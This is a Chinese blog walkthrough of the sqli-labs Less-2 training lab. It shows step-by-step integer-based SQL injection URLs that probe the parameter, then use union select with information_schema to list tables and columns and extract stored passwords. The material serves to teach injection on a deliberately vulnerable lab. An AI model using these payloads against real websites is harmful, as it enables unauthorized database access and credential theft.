Sqli-labs Less-2 GET - Error based - Intiger based

最新推荐文章于 2024-07-11 21:41:59 发布
最新推荐文章于 2024-07-11 21:41:59 发布
阅读量151 收藏 3
点赞数 2
分类专栏: sql注入学习 文章标签: mysql sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25500649/article/details/115698026
版权

这个题目,打开网页显示输入一个整数id作为参数,输入id=1打开页面查看,显示出了一个名字和密码,在1后面加单引号测试一下看会不会出错。

可以看到报了一个语法错误。接下来再尝试在后面跟 and 1=1#和and 1=2# 测试一下。

/sql/Less-2/?id=1 and 1=1#

结果如下图,与id=1结果没有不同,下面尝试 and 1=2;

/sql/Less-2/?id=1 and 1=2#

当注入 and 1=2;时 返回结果与上面不同,可以确定这是一个注入点。

接下来尝试使用

sql/Less-2/?id=1 union select 1,2,3#

来查看回显位置在哪里。

考虑可能是由于显示位置只有两个,当我们设置一个数据库中没有的id值时,就可以回显union查询的内容。

/sql/Less-2/?id=-1 union select 1,2,3#

我们看到回显2和3的位置。

我们可以使用user()与database()两个函数查看使用数据库的用户和数据库名字。

/sql/Less-2/?id=-1 union select 1,user(),database()#

我们可以看到数据库用户是root,数据库的名称是security。

接下来就可以爆数据库中的表名称。

/sql/Less-2/?id=-1 union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3#

我们看到有一个emails表,修改limit的参数值可以查看数据库中的其他表名称。

/sql/Less-2/?id=-1 union select 1,(select table_name from information_schema.tables where table_schema='security' limit 3,1),3#

接下来爆users表的字段名称。

/sql/Less-2/?id=-1 union select 1,(select column_name from information_schema.columns where table_name='users' limit 0,1),3#

同样的修改limit的参数值可以获取其他字段名称。

/sql/Less-2/?id=-1 union select 1,(select column_name from information_schema.columns where table_name='users' limit 1,1),3#

接下来就可以查询密码一列的内容。

/sql/Less-2/?id=-1 union select 1,(select password from security.users limit 6,1),3#

 

搞定

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Ushernrt
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GET-Error based-intiger based (基于错误的GET整型注入) Less-2
water0diamond的博客
03-12 1027
进入第二关,有了less-1的基础后,我们直接开始提交参数。判断是否有注入点。 测一下id可以观察到报错信息可以看出来是数字型id,且没有任何包裹 使用order by http://localhost/sqli/Less-2/?id=1 order by 1%23 数字变化后可以试出字段 联合查询字段 http://localhost/sqli/Less-2/?id=-1 un...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-lab-less2
Sa1nZen的博客
06-05 78
sqli-lab-less2
Sqli-labs Less-1 报错注入
04-14 389
Sqli-labs Less-1 报错注入 1、首先打开less1后是一个页面,提示输入id作为参数。输入id=1试一下。 然后会出现,name 和 password,添加一个单引号 ' 测试一下注入点。 输入单引号发现,会直接将报错结果显示在页面中这里就可以尝试报错注入,将用户、数据库名称都爆破出来。 这里我们使用updatexml函数获取user()值。下图可以看到报错注入确实有效,我们看到用户为root,接下来爆数据库的名字。 0x7e是 '~' 的ASCII编码。 /sq.
sqli-labs:less-2(数字型报错注入)
羽的博客
07-12 216
贴上源代码: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html...
SQLsqli-labs注入Less-2~4
Nuyoah的博客
12-13 405
与Less-1相同,我们同样使用?id=1'看是否可以注入, 发现不可以,并且提示错误,我们可以知道,这里多加了一个引号,这就是与Less-1不同的地方,除此之外,以下步骤与Less-1相同 2.接下来我们使用 order by 查看有多少列 仍然有三列3.使用联合查询 union select 看有哪些数据可以回显 4.接下来查询所有数据库 5.继续查询表 6.再查询列 7.最后取出所有数据 ...
Sqli-labs之Less-2
→_→
03-12 1250
Less-2 翻译:获取-基于错误-基于整数 欢迎Dhakkan 请输...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-lab教程——Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
luosaierdadi的博客
07-06 192
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉,其它保持不变就行了。
sql-labs SQL注入平台——第二关Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Onlyone_1314的博客
05-28 1613
只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上。查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;得到security数据库中的表emails,referers,uagents,users。返回结果错误:没有第4列数据,说明只存在三列数据。查询,返回结果按照前4列数据排序。(3)查询当前数据库的名称。
SQL注入攻击】GET-Error based - Intiger based (基于错误的GET整型注入)
sm1918451478的博客
10-21 918
SQL注入攻击】Error based - Intiger based (基于错误的GET整型注入)
sqli-labs】 less2 GET - Error based - Intiger based (基于错误的GET整型注入)
ajxi63204的博客
01-18 260
与less1相同,直接走流程 提交参数,直接order by http://localhost/sqli/Less-2/?id=1 order by 1%23 http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 http://localhost/sqli/Less-2/?id=-1 uni...
centos7中MySQL的卸载
CodeTom的博客
07-11 241
6、删除/var/log/mysqld.log(如果不删除这个文件,会导致新安装的mysql无法生存新密码,会出现无法登陆的情况)卸载完成后不要忘记检查一遍是否卸载干净。4、对安装的所有XXX目录进行删除操作。1、查看mysql安装了哪些东西。5、删除/etc/my.cnf。删除完成后检查是否删除干净。3、找mysql相关目录。
JavaFx+MySql学生管理系统
最新发布
2301_81253185的博客
07-11 1107
上个月学习了javafx和mysql数据库,于是写了一个学生管理系统,因为上个月在复习并且有一些事情,比较忙,所以没有更新博客了,这个项目页面虽然看着有点简陋了,但是大致内容还是比较简单的,于是现在跟大家分享一下我的学生管理系统,希望对这方面有兴趣的同学提供一些帮助。
数据库(mysql)忘记密码解决办法
GGB_GG的博客
07-11 495
【代码】数据库(mysql)忘记密码解决办法。
mysql笔记1
m0_62975692的博客
07-11 380
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值